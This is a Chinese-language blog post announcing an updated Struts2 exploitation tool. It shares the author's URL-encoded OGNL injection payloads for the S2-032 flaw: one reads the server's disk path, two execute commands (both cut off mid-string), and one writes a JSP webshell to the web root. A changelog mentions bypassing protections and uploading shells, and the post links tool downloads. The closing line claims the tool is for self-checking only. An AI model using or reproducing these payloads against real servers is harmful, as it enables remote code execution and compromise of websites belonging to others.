原文地址：http://www.shack2.org/article/1374154000.html
Struts2漏洞利用工具下载(已更新V1.6版)

新鲜出炉支持Struts2 s2-032漏洞的检查利用。如果有对Struts2 S2-029 这个鸡肋漏洞有兴趣的可以找我要下检查工具，这个鸡肋工具就不在这里共享了。

顺便分享下我改写的exp：

S2-032 20160426 漏洞参考 http://seclab.dbappsecurity.com.cn/?p=924

获取磁盘目录：

method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8

执行命令:

1. method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[

2. method:%23_memberAccess[%23parameters.name1[

上传文件：

method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&shellname=stest.jsp&shellContent=tttt&encoding=UTF-8&pp=%2f

更新日志：

2016-04-26：
增加最新的S2-032远程代码执行漏洞，和S2-019很相似。
参考：http://seclab.dbappsecurity.com.cn/?p=924

2015-12-01：
采用scanner读数据流，再也不用担心s16不能执行net user/ipconfig/netstat -an等命令了。
增加复杂数据包（multipart/form-data）提交方式进行漏洞利用，可绕过部分防护。可执行命令，暂时无法上传文件。

2014-11-12：
最近遇到s19这个debug模式开启导致代码执行，这个有点少，但还是有一些，为了方便大家把13版本修改了一下。可以利用这个漏洞执行命令、上传shell。
警告：
本工具为漏洞自查工具，请勿非法攻击他人网站！

仅提供验证漏洞使用，请勿非法使用，产生的任何法律问题，一概与本人无关。

下载地址：
Struts2漏洞利用工具2016版.rar 1461677445539015176.rar
Struts2漏洞利用工具2015版.rar 1449155324117072208.rar